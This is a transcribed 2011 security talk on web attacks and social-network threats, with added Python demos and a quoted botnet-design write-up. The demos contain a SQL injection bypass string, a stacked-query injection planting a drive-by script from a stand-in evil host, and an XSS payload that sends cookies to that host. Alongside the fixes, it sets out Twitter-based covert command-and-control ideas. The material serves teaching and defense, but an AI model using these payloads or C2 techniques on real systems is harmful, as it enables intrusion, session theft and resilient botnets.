Jean-Pier Talbot - Web is the Battlefield - AtlSecCon 2011

Page 1:

Web is the Battlefield

Jean-Pier Talbot
Sales Engineer, WatchGuard

[email protected]
Direct: 514-394-0893

Toll free: 1-855-394-0893

Page 2:

Agenda / Goals

Agenda:

• Explain why web-based attacks are today’s biggest threat

• Describe and demonstrate the three most common web attacks

• Learn how social networks are the most dangerous web sites of all

Page 3:

Web Threat Statistics

[Chart: Web Sites with Malcode. Malicious 23%, Legitimate 77%]

Malicious web sites increased by 111.4% between 2009 and 2010

The average website has 13 serious vulnerabilities

79.9% of web sites with malcode are hijacked legitimate sites

52% - 60% of data-stealing happens over the web

76% of breaches target web apps

[Chart: Web Application 76%, Infrastructure 14%]

According to Websense, Jeremiah Grossman of WhiteHat Security, Verizon & 7Scan

Presentation Notes:
Sources: Websense Threat Report 2010 (http://www.websense.com/content/threat-report-2010-introduction.aspx); Verizon 2010 Data Breach Investigations Report; Jeremiah Grossman, WhiteHat Security.

Websense Threat Report 2010: found a 111.4% increase in the number of malicious sites between 2009 and 2010. Pretty much 80% (79.9%) of sites with malicious code were hijacked legitimate sites. Searching for breaking trends and news is more dangerous than searching for objectionable content. About 90% (89.9%) of unwanted email contains links to spam sites or malware. 52% of data stealing happens via the web. Websense's statistics show that 22.4 percent of real-time search results on entertainment lead to a malicious link. What percentage of the top 100 most popular websites are categorized as Social Networking or search? 65% of the Top 100 and 95% of the Top 20. 40% of all Facebook status updates have links, and 10% of those links are either spam or malicious.

Verizon 2010 Data Breach Investigations Report: "The majority of breaches and almost all data stolen (98%) in 2009 is the work of criminals outside the victim organization." How do breaches occur? 48% privilege misuse, 40% hacking, 38% malware; hacking and malware account for 95% of data compromise. The majority of breaches and almost all of the data stolen in 2009 (95%) were perpetrated by remote organized criminal groups hacking "servers and applications", that is, hacking web servers and web applications, "websites" for short. The attack vector of choice was SQL injection, typically a vulnerability that can't readily be "patched", used to install customized malware.

Jeremiah Grossman, WhiteHat Security: the average website had nearly 13 serious vulnerabilities. Cross-Site Request Forgery moved up to 4th place. With respect to the average number of serious vulnerabilities within large organizations, Social Networking, Banking, and Healthcare had the best marks with 4.38, 5.18, and 3.68 respectively. The three worst were IT, Retail, and Financial Services, with 29.55, 18.44, and 10.34.
Page 4:

Malware Volume Out of Control

Credit: Panda Security

Presentation Notes:
Malware volume is out of control. Packing, crypting, and other malware obfuscation techniques are creating thousands of new variants of the same threat. The growth of new malware variants is exponential.
Page 5:

Why Attackers Moved to the Web

We've Blocked Other Vectors of Attack

• Servers and OSs firewalled and hardened
• Email vector well protected
• Users more savvy to email threats

Your Browser Has Become the Universal App

• 3rd party add-ons and plug-ins increase attack surface
• We do much more on the web

Web 2.0 Presents a Juicy Target

• Complexity breeds insecurity
• Its goal is to allow more user interaction and content… that's dangerous

Page 6:

What's Scareware

Also called Fake AV or Rogueware, Scareware is a class of malware that pretends to be legitimate software, usually security-related software like AV, and tries to scare the victim into paying for a "registered" version of the software in order to fix a fictitious computing or security problem. Some Scareware is benign, but other samples include backdoor or trojan components.

Page 7:

Scareware Stats

• Scareware infections increased almost 47% between H1 and H2 '09 (and continue to increase)

• FakeXPA was the 3rd most prevalent threat MS detected in late '09

• Experts believe Scareware is one of the payloads that makes attackers the most money

Page 8:

Combined Web Attacks Common

Part 1: Automated SQL Injection Attack
Part 2: Drive-by Download

<iframe><script src="http://EvilWebSite.cn/EvilJavaScript.js"></script></iframe>

Page 9:

Web Attacks: SQL Injection

SQL Injection: “An attack technique that allows hackers to gain control of a website’s underlying database due to flaws in the website’s application code.”

Currently the most common attack

Attackers can leverage SQL Injection attacks in countless ways

Often used to harvest sensitive data for identity theft

Millions of legitimate web sites hijacked with SQL injection attacks

Presentation Notes:
In order to provide the dynamic content I mentioned before, most modern websites also rely on a backend SQL database. For instance, when you log in to a site that requires authentication, the web application communicates with a database to check your username and password, and uses that to decide what content you should see.

[top bullet] As with XSS, if a web developer doesn't code this SQL interaction securely, an attacker can take advantage of flaws in the code to sneak unexpected SQL queries to the database server. This is called SQL injection.

[second bullet] There are many evil things attackers can do with SQL injection. They can steal confidential and private data from your database, such as your customers' credit card info, home addresses, SSNs, etc. They can leverage logic tricks within SQL to bypass authentication mechanisms. They can even add, remove, or modify data in your database. For instance, attackers could leverage SQL injection to change the prices of your products on your ecommerce site.

[last bullet] Remember when I mentioned in my earlier slides that millions of legitimate web sites were forced to serve malicious DbD code this year? Guess how that happened? Those sites were all hijacked via automated SQL injection attacks. Attackers indiscriminately sent out millions of blind SQL injection strings all over the Internet. Most of those SQL injection strings hit securely coded sites and failed. That doesn't really bother the attacker, because for every 100 that failed, one or two might have worked. And when it worked, a legitimate web site was forced to host the attacker's malicious DbD, in the end earning the attacker more money.
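As an added example (not code from the talk), here is the combined attack from the "Combined Web Attacks" slide run end to end against an in-memory SQLite database in Python: a login query built by string concatenation that the bypass string defeats, the parameterized version that does not, and a stacked-query injection that appends the slide's drive-by script to every stored post so the site serves it to its own visitors. The table names, sample rows and payload strings are all constructed for the demonstration; SQLite's executescript stands in for the stacked-query behaviour of the database servers the mass injections actually hit.

```python
"""Added example (not from the talk): SQL injection for authentication
bypass, the parameterized fix, and the mass-injection pattern that
turned legitimate sites into drive-by download hosts.

Everything here (tables, rows, payloads) is constructed for the demo."""
import sqlite3

# Constructed payload: what the attacker types into the password field.
BYPASS = "' OR '1'='1"
# Constructed drive-by payload, modelled on the slide's script tag.
DRIVE_BY = '<script src="http://EvilWebSite.cn/EvilJavaScript.js"></script>'


def build_db():
    """A tiny site: one user table, two pages of content."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(name TEXT, password TEXT);
        CREATE TABLE posts(id INTEGER PRIMARY KEY, body TEXT);
        INSERT INTO users VALUES ('alice', 's3cret');
        INSERT INTO posts(body) VALUES ('Welcome to our store');
        INSERT INTO posts(body) VALUES ('Spring sale starts Monday');
    """)
    return db


def login_vulnerable(db, user, pw):
    """The flaw: user input is pasted into the SQL text, so the quote in
    BYPASS closes the literal and the OR makes the WHERE clause true."""
    sql = "SELECT COUNT(*) FROM users WHERE name='%s' AND password='%s'" % (user, pw)
    return db.execute(sql).fetchone()[0] > 0


def login_safe(db, user, pw):
    """Same query; the values travel as bound parameters, never as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE name=? AND password=?"
    return db.execute(sql, (user, pw)).fetchone()[0] > 0


def inject_drive_by(db):
    """Part 2 of the combined attack: a stacked UPDATE riding on a page
    lookup whose id parameter is concatenated into the query. One hit
    rewrites every content row, so every visitor gets the script."""
    # Constructed: the tainted "id" parameter the attacker sends.
    tainted_id = "1; UPDATE posts SET body = body || '%s'" % DRIVE_BY
    db.executescript("SELECT body FROM posts WHERE id=%s" % tainted_id)


def poisoned_posts(db):
    """How many stored pages now carry the attacker's script?"""
    rows = db.execute("SELECT body FROM posts").fetchall()
    return sum(1 for (body,) in rows if DRIVE_BY in body)


if __name__ == "__main__":
    db = build_db()
    print("vulnerable login with bypass:", login_vulnerable(db, "nobody", BYPASS))
    print("safe login with bypass:", login_safe(db, "alice", BYPASS))
    inject_drive_by(db)
    print("posts now serving the drive-by:", poisoned_posts(db))
```

The parameterized query is the fix: the bound values never become SQL text, so BYPASS is simply compared against the password column and fails. Note that the injected UPDATE hits every row, which is why spraying millions of blind probes paid off even at a hit rate of one or two per hundred: a single success turns a whole site into a drive-by host.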
Page 10:

Web Attacks: SQL Injection

Page 11:

Web Attacks: SQL Injection

Page 12:

Web Attacks: Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS): "In general, an attack technique that allows an attacker to run script on a victim's computer under the context of another website the victim trusts. This attack exploits the trust the user has for a particular site."

Steal cookies, hijack session, do anything user can

Provides social engineering opportunities for phishers

Often used in conjunction with DbD attacks

April 2010, the Apache Foundation was breached with XSS

Presentation Notes:
Today, we expect websites to deliver dynamic content personalized for us. To do this, websites have become web applications, designed so that we can interact with them in ways we never did before. In the past, websites only displayed information. Now they allow users to post information to them as well. Unfortunately, this new level of interaction between users and websites has opened up a new class of security vulnerabilities: web application attacks.

[top bullet] One example of a web application attack is Cross-Site Scripting. If a web developer doesn't program the web application to interact with users securely, attackers get the opportunity to inject scripts into the site's pages. For example, say you run a classified sales web forum, similar to craigslist.com. You allow users to post items for sale on the forum. You also allow the forum posts to contain HTML code so that users can do things like add bold tags or make text flash. This gives attackers the opportunity to add HTML scripts to forum posts. An attacker could put up a fake "for sale" post that contains malicious web script. When another user visits that attacker's post to see what he has for sale, the user unknowingly runs the attacker's script with the privileges of the classified sales web site. That means the attacker gains access to anything that user has on that site. For instance, he could steal the web cookie your browser uses to keep an authenticated session open. He could then use that cookie to log in as you and do lots of bad things. If the site stores your credit card info, the attacker can go on a shopping spree.

[second bullet] For a long time, buffer overflows were the most commonly reported vulnerability, and one could argue the most exploited vulnerability on the Internet. That's no longer true. In 2008, Cross-Site Scripting flaws became the most commonly reported vulnerability. Jeremiah Grossman, from WhiteHat Security, claims XSS vulnerabilities can be found in 70 percent of websites.

[last bullet] Cross-Site Scripting lets an attacker do things on a victim's computer with the same privileges as some other trusted website. That means attackers can exploit XSS flaws to read the cookies of other websites (among other things). So if a banking site suffers from an XSS flaw, a phisher can leverage that flaw to steal the cookie used for your web session to your banking site. In other words, they could log in to your banking site AS YOU and do whatever they wanted. They'd only have to entice you to click on some specially crafted link for their attack to succeed.
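As an added example (not from the talk), the classified-ads forum from the notes above in Python: a render function that copies user HTML straight into the page, beside one that rebuilds the post through a tag allowlist so the bold and italic the forum wants survive but script blocks and event-handler attributes do not. The posts, the allowlist and the cookie-stealing payload are all constructed for the demonstration.

```python
"""Added example (not from the talk): stored XSS in a forum that allows
HTML in posts, and an allowlist sanitizer as the fix.

The posts, the allowed tags and the attacker's script are constructed."""
from html import escape
from html.parser import HTMLParser

# Formatting the forum wants to keep. Anything else is dropped, and no
# attributes survive, so onmouseover= and javascript: URLs never reach
# the page.
ALLOWED_TAGS = {"b", "i", "u", "p", "br"}

# Constructed attacker post: looks like a listing, ships the viewer's
# session cookie to the attacker's server, and carries an event handler.
EVIL_POST = ('<b>Bike for sale</b><script>'
             'new Image().src="http://EvilWebSite.cn/c?"+document.cookie'
             '</script><i onmouseover="alert(1)">cheap</i>')


def render_vulnerable(post_html):
    """The flaw: user-supplied HTML is copied straight into the page."""
    return "<div class=post>%s</div>" % post_html


class AllowlistSanitizer(HTMLParser):
    """Rebuilds a post keeping only allowlisted tags, with no attributes.
    Text is re-escaped on the way out, so a '<' inside the text can never
    open a tag, and script/style bodies are discarded entirely."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip = 0  # depth inside a dropped <script>/<style> block

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        elif tag in ALLOWED_TAGS and not self._skip:
            self.out.append("<%s>" % tag)  # attributes deliberately dropped

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = max(0, self._skip - 1)
        elif tag in ALLOWED_TAGS and not self._skip:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=True))

    def result(self):
        return "".join(self.out)


def render_safe(post_html):
    """Same page, but the post is passed through the allowlist first."""
    s = AllowlistSanitizer()
    s.feed(post_html)
    s.close()
    return "<div class=post>%s</div>" % s.result()


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(EVIL_POST))
    print("sanitized: ", render_safe(EVIL_POST))
```

Output encoding alone (html.escape on everything) is simpler and safer when a site does not need to accept markup; the allowlist approach is what a forum that wants `<b>` and `<i>` has to do, and it must drop attributes wholesale rather than try to blocklist `on*=` names. Marking the session cookie HttpOnly blunts the cookie-theft payload specifically, but not the rest of what injected script can do while acting as the user.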
Page 13:

Cross-Site Scripting DEMO (1)

Page 14:

Botnets: Ultimate Blended Threat

Distributed Denial of Service (DDoS)

Spamming

Phishing

Click Fraud

ID Theft (on a massive scale)

Distributed password/hash cracking

Install additional malware

Backdoor access

Keylogging / spy on victim

Steal credentials

Proxy through victim

Leveraged in most attack campaigns

Botnets are the Swiss Army knife of the malware world, and bot-herders have many blades to choose from.

Presentation Notes:
Trojans/bot clients: many AV and anti-malware firms report that the vast majority of new malware are Trojans (typically bot clients that add you to a botnet).
Page 15:

Botnets Still Evolving Quickly

Page 16:

2010 Botnet Incidents: Zeus v3 (Zbot)

• Comes as a pre-packaged crimeware kit

• Heavily geared towards online banking attacks

• Steals credentials from Banks and Social Networks

• Generates phishing pages locally (web page injection)

• Responsible for many different malware campaigns

• Some estimate it has infected 1 of every 100 computers

• Check out: https://zeustracker.abuse.ch

Page 17:

Source: Network World March 2010

Page 18:

So What is Their Goal?

Page 19:

Plain and Simple it is Monetary Gain

Presentation Notes:
There is only one primary reason the bad guys build botnets: to make money. In order to make this money, they must stay online and active. They do NOT want the press or authorities to notice their activities, since that increases the chance someone will shut them down.
Page 20:

Social Networks: The #1 Web Threat

Page 21:

What is a Social Networking Site?

Presentation Notes:
A social network site is any place online where you can chat with other people, share information like pictures, stories, and videos, and even play games. Here are a few examples [click] of some popular social network sites. Do any of you have accounts on Facebook? Neat, so do I. How about Webkinz? That one is popular with my younger daughter. These are just a few examples of social network sites. There are literally [click] thousands of these types of sites on the Internet, and they are easily the most popular sites both adults and kids visit online. However, while social network sites are fun places to hang out, meet people, and even learn, they can also be dangerous, because mean people can use them too. Let's talk about a few things you can do to keep yourself safe while you explore these sites.
Page 22:

SocNets are Hugely Popular

[Chart: SocNet Unique Visitors (in millions), according to comScore, Inc. Bars for Flickr, LinkedIn, Myspace, Twitter, Blogger, Windows Live and Facebook on a 0 to 500 million axis; the figures are given in the notes.]

Presentation Notes:
According to Alexa.com, five of the top ten most visited sites are social networking sites. Nielsen Online says SocNets are now the 4th most popular online activity, ahead of personal email; 67% of the global online population visit SocNets, accounting for almost 10% of all Internet time. 65% of the Top 100 and 95% of the Top 20 are social network sites (Jeremiah Grossman, WhiteHat Security). 40% of all Facebook status updates have links, and 10% of those links are either spam or malicious (Jeremiah Grossman, WhiteHat Security). Top SocNet sites by unique worldwide visitors (according to comScore): Blogger (222 million), Facebook (400 million, Feb 2010), LinkedIn (now at 60 million), MySpace (126 million), Twitter (75 million). SocNets provide a humongous, ripe victim pool for attackers.
Page 23:

Two Types of SocNet Risks

Social / Technical

Presentation Notes:
The risk posed by social networks is twofold: social risks and technical risks.
Page 24:

Technical: Web App Security Nightmare

Web 2.0 problems

Allow user content

Allow offsite content

Tons of potential for XSS and XSRF attacks

Connections between SocNets

Presentation Notes:
The complexity of Web 2.0 technologies exposes a huge potential attack surface if coded poorly. Allowing user content, content outside your control, is impossible to manage; the same goes for allowing links to external content. Allowing user or external content gives attackers many avenues for XSS and XSRF. Social networks are starting to link credentials together, so change.gov knows your MySpace login.
Page 25:

Social: A Culture of Trust

People like to accept friends

No technical way to validate friends

People will click things friends send

People love to take quizzes and load apps

Presentation Notes:
40% of all Facebook status updates have links, and 10% of those links are either spam or malicious (Jeremiah Grossman, WhiteHat Security). Social networks are built upon trust. If you don't take special care to confirm, you must trust that someone befriending you is really who they say they are.

Marcus Ranum (the CTO of Tenable Security) anecdote: Shawn Moyer and Nathan Hamiel's experiment. They masqueraded as Ranum on LinkedIn: 50+ connections in 24 hours, and after joining several security networking communities to build more credibility (CISO: Meaningful Metrics, ISACA, Executive Suite, Security, Security Leaders, and BlackHat), they got connection requests from the CSO of a security firm, from a former CSO of a Fortune 100 company, and then from Ranum's sister, who also fell for the ploy. CISSPs, feds, etc. Attackers will be drawn to this culture of trust like bees to honey, hoping to exploit it in their social engineering attacks.

Pete Warden, a tech entrepreneur and former Apple engineer, culled a data set from Facebook's public profile pages. Warden had spent several months and tens of thousands of dollars crawling the public pages and collecting data on individuals: their location, fan pages, and a sampling of their friendships. Facebook threatened to sue, so he deleted it, but it illustrates the huge privacy leak potential.

On April 19th, Facebook removed its users' ability to control who can see their own interests and personal information (actually an opt-in/opt-out change?). Certain parts of users' profiles, "including your current city, hometown, education and work, and likes and interests", will now be transformed into "connections", meaning that they will be shared publicly. If you don't want these parts of your profile to be made public, your only option is to delete them. This benefits Facebook and its partners; it doesn't seem to benefit the user. Three Democratic senators today asked the Federal Trade Commission to take a look at Facebook's controversial new information sharing policies, arguing that the massively popular social network overstepped its bounds when it began sharing user data with other websites. Personal information like current city, hometown, education and work, likes and interests, and sexual orientation will now become "connections", and as such will be made public. Users are not asked for permission, because the changes are "opt-out". Not for under-18s. (This is called the Open Graph API; it connects sites such as IMDB, Pandora, etc.)
Page 26:

Apps Can Be Dangerous

Social Networks let almost anyone make apps

Some apps are (or can become) malware

Bad guys target popular apps

Last year, Farm Town got hacked

Presentation Notes:
The last thing we want to share about social network sites is their apps or games. Most social network sites have little online applications or games, which they often call apps. Have any of you ever done a fun quiz on Facebook? That is an app. How about playing a fun game on Webkinz? That too is an app. These apps are usually great fun, but they can also be dangerous. For instance, [click] most social network sites allow any of their users to create apps for other people to use or play. This is really a fun, neat idea that allows everyone to share their creativity with the world. The problem is that bad guys can also make apps that harm your computer, or try to steal information from you. In fact, [click] sometimes the apps and games on social networks have contained something called malware. Malware is a bad computer program that usually tries to steal information from your computer. Often, the bad guys [click] know which are the most popular apps on a web site, and they specifically target those applications. For example, have any of you played Farm Town or FarmVille? Cool. [click] FarmVille and Farm Town are both VERY popular game apps that you can play on Facebook and some other social network sites. They allow you to manage your own farm, plant crops, and have your friends visit your farm. A few weeks ago, some bad guys figured out a way to get malware into Farm Town. In the computer security world, we would say they hacked Farm Town. Basically, the bad guys snuck an evil program into the advertisements that show up when you play Farm Town. As you played the game, the evil program would make this [click] window pop up on your computer. It says your computer has something called a virus, and tells you that you need to pay money to buy a program to fix it. However, this is all fake. Your computer doesn't really have a virus. The bad guys just want your money. Now, there really is no way for you to easily tell the bad apps or games from the good ones. And sometimes, bad guys can even sneak bad stuff into the good games anyway. So to protect yourself from this kind of thing, you should make sure your computer uses security software. When you go home tonight, you might want to ask your parents if they run security software on your computer. If they don't, let them know there are free ones that work.
Page 27:

Actual SocNet Attacks

Hundreds of variants of Koobface

Tons of SocNet phishing (URL Shortening)

Twitter worms (StalkDaily and Mikeyy [sic])

SocNet spam increasing (with malware links)

Twitter DDoS and BotNet C&C (KreiosC2)

Attacks target popular apps (Farm Town)

$25 Malicious Facebook App kit (Tinie)

Like-jacking (due to OpenGraph API)

Presentation Notes:
Koobface is a SocNet worm. When someone is infected, it sends a social engineering message to all of that victim's SocNet friends. The message contains some hook and a web link to offsite content. If your friends visit that content, they get asked to install a more up-to-date version of Flash, or a new video codec, to see the content. If they allow the install, they get infected with Koobface. Very much like past email worms, just leveraging the SocNets.

Facebook suffered many phishing attacks, like the "FBAction.net" attack. You might get a message asking you to log in to Facebook, but it pointed to a fake Facebook site. If you logged in, the attacker stole your credentials.

StalkDaily and Mikeyy leveraged XSS flaws in the Twitter site to hijack people's Twitter accounts and spam tweets as them. You would get infected if you visited a malicious or infected Twitter profile.

The rest of these notes is quoted from the KreiosC2 author's own write-up of the tool:

KreiosC2 is a proof of concept bot which uses various unusual systems as its Command and Control channel. Obviously this can be used for malicious purposes but also for good ones; for example, you can set up a bot at home to listen to your Twitter feed and perform actions on it. I'll discuss the potentially malicious use of it here, but it would be easy to take the concepts and use them for good. They say a picture is worth a thousand words, so a video must be worth more; here are two videos demonstrating KreiosC2: the first video of KreiosC2 in action, put together by Tom Eston for his Defcon talk, "Social Zombies - Your friends want your brains", and the second created by me for the sequel, "Social Zombies II, Your friends need more brains".

What's new in version 3? Version 3 was released at Shmoocon 2010 as part of the "Social Zombies II, Your friends need more brains" talk given by Tom Eston, Kevin Johnson and myself. It adds support for channelling through LinkedIn and has been tested under Windows. As soon as the videos are posted I'll add a link.

What's new in version 2? In this release I've separated the code which downloads the messages from the main body of the application, in the same way as the languages are self-contained files. This allowed me to add new command channels as well as the original Twitter. With this version you can now pass messages encoded in TinyURL shortened URLs and through text hidden in JPEGs. Also, with the way the system is built, it is a simple process to add a new type of channel and roll it out to a live system. I've called these new channel types protocols and you can read more about them in the How it all works section.

What's new since version 1? First, the name change. Version 1 of this project was called TwitterBot. Unfortunately, I didn't do any research before using the name, and only after I launched it I realised that there were already a lot of other projects out there with the same name. The name KreiosC2 was created by Tom and is made up from Kreios, a Greek Titan God, and C2, which is the name the military uses to define command and control. Second, and really more importantly, KreiosC2 now has the ability to dynamically update the control language used and add new features on the fly without any restarts or any manual intervention.

Background. The reason I was thinking about Twitter is it has such a large community that it would be easy to hide random commands in the large amount of data that is generated each day. It also has a really good API that would make integration easy. My first idea was to have a protected Twitter account which only the bots could read. This would restrict who could see the commands, but it would be easy for Twitter to block that user. My next thought was to send the commands to random accounts and then have the bot use the search feature to find the commands. This would mean that it would be harder for Twitter to block the messages, as the commands could be posted from any account to any other account. For this to work the bot would have to have a way to spot the commands in the general mess of other tweets out there. The problem with this is that if the bot can spot the commands then Twitter could also do the same matching and automatically drop those tweets. This is a harder one to defend against. My plan to defeat this would be to use seemingly innocent commands, such as "check out this link ..." to, say, download a file, which would be hard for Twitter to block without upsetting legitimate users, but I don't know how hard it would be to create a command language based on this.

I proposed these ideas to Tom Eston (from the Security Justice Podcast), who is currently doing work on social media botnets, and to Mubix (who everyone knows). Tom suggested using TinyURL to obfuscate commands, or to use hash tags to represent certain things. You could also get the bots to follow certain accounts to mark themselves as bots. If they followed a specific bot master account then they would be easy to spot, but having them follow a general account, the BBC say, again they could be lost in the masses unless you knew where to look. Tom is giving a talk at Notacon where he will be talking a bit more about this and other social media bots.

Mubix added the following ideas: use a time-based code that is based on the time of the Twitter update, so bots check via the public timeline what the current time is, and based on the hour they are checking within (7AM, 2PM etc.) they have a specific minute to look for a command within (i.e. at 7 PM they are looking for a command at 7:13). This command would be a cipher text posted by one of over a hundred dummy Twitter accounts, and no matter how many accounts Twitter got rid of, you could always make more. Again going with the key, you could simply use Unix time as part of the post. So, the bot checks Twitter time based on the public stream, converts to Unix time, does a search on Twitter for the current Unix time and looks for the second part of the key, which would be an easy cipher. Once they found the key, it would be: "1239197528 How do I convert this to normal date time?" And then the bot would take the first letter of each of the words, HDICTTNDT, look up that user, then take its latest post and issue the command in the post: "ping -t victim.com". Some interesting ideas on the packet structure have been suggested by Tcrweb at his blog. I'd personally expand the command byte to at least two bytes to allow for expansion, but apart from that I like the ideas.

Conclusion. Hopefully this gives you an idea of the potential for using channels other than IRC to control a bot or botnet. Versions 1 and 2 both suffer from the problem that once someone reverse engineers a bot and works out the command syntax it would probably be possible for Twitter to shut the system down fairly well; however, as version 3 now allows you to switch channels, it makes the job of shutting down the network much harder, and if the reverse engineering job was made hard enough and the methods of hiding the commands made either very generic or just maybe a really large amount of them, maybe 50 different ways to say execute a command, then it would take admins a while to work out the fix and implement it, which may just give the bad guys the edge they need. I was in two minds about releasing this idea, partly because I thought it was a bit mad, as Twitter could shut this kind of thing down a lot easier than, say, the DNS registrars could stop the registering of the domain names Conficker uses to control its bots, and partly because if it did work and someone does use this for badness then it is quite scary that I may have triggered it. But after talking to Mubix and Tom we decided that disclosure is better than keeping things boxed up, so I've put it out. Please give me any feedback as I'm interested to know what others think.
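As an added example (not code from KreiosC2 or from the talk), the time-keyed lookup described in the notes above, in Python over a constructed timeline: the bot finds the tweet that opens with the agreed Unix time, takes the initials of the rest of the sentence as a handle, and reads that account's latest post as its command. A small defender-side check flags tweets that open with a near-current timestamp, which is the pattern a content filter would key on. All tweets, handles and the command are made up for the demonstration.

```python
"""Added example (not part of KreiosC2 or the talk): the Unix-time keyed
Twitter command channel sketched in the notes, decoded offline over a
constructed timeline, plus the matching defender-side check.

TIMELINE, the handles and the command are all constructed."""
import re

# Constructed sample of a public timeline as (user, unix_time, text).
TIMELINE = [
    ("bbcnews",   1239197500, "Markets open lower after overnight trading"),
    ("hdicttndt", 1239197510, "ping -t victim.com"),  # command account's latest post
    ("dummy042",  1239197528, "1239197528 How do I convert this to normal date time?"),
    ("alice",     1239197530, "lunch was great, thanks @bob"),
    ("hdicttndt", 1239197400, "brb"),
]

# A key tweet opens with a 9- or 10-digit Unix time, then the cover sentence.
KEY_RE = re.compile(r"^(\d{9,10})\s+(.+)$")


def initials(sentence):
    """'How do I convert this to normal date time?' -> 'hdicttndt'."""
    return "".join(w[0] for w in re.findall(r"[A-Za-z][\w']*", sentence)).lower()


def find_key_tweet(timeline, unix_time):
    """The bot's 'search for the current Unix time': return the cover
    sentence of the tweet that begins with exactly that timestamp."""
    for _user, _when, text in timeline:
        m = KEY_RE.match(text)
        if m and int(m.group(1)) == unix_time:
            return m.group(2)
    return None


def latest_post(timeline, user):
    """Most recent text posted by the given handle, or None."""
    posts = [(when, text) for u, when, text in timeline if u == user]
    return max(posts)[1] if posts else None


def resolve_command(timeline, unix_time):
    """Full bot-side decode: key tweet -> initials -> handle -> command."""
    key = find_key_tweet(timeline, unix_time)
    if key is None:
        return None
    return latest_post(timeline, initials(key))


def suspicious_key_tweets(timeline, now, window=3600):
    """Defender's view: tweets that open with a Unix timestamp within
    `window` seconds of now. Legitimate users rarely write that."""
    hits = []
    for user, _when, text in timeline:
        m = KEY_RE.match(text)
        if m and abs(int(m.group(1)) - now) <= window:
            hits.append((user, text))
    return hits


if __name__ == "__main__":
    print("bot resolves:", resolve_command(TIMELINE, 1239197528))
    print("filter flags:", suspicious_key_tweets(TIMELINE, 1239197600))
```

The decoder is a few lines once the scheme is known, which is the point the author makes in the conclusion: the channel only survives until one bot is reverse engineered, after which the same matching the bot uses works just as well for the platform's filter.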
Page 28:

Social Networks = Malware Cesspool

Social Issues

Technical Issues

Huge Popularity

Page 29:

© 2009 WatchGuard Technologies

Thank you !

Questions ?

[email protected]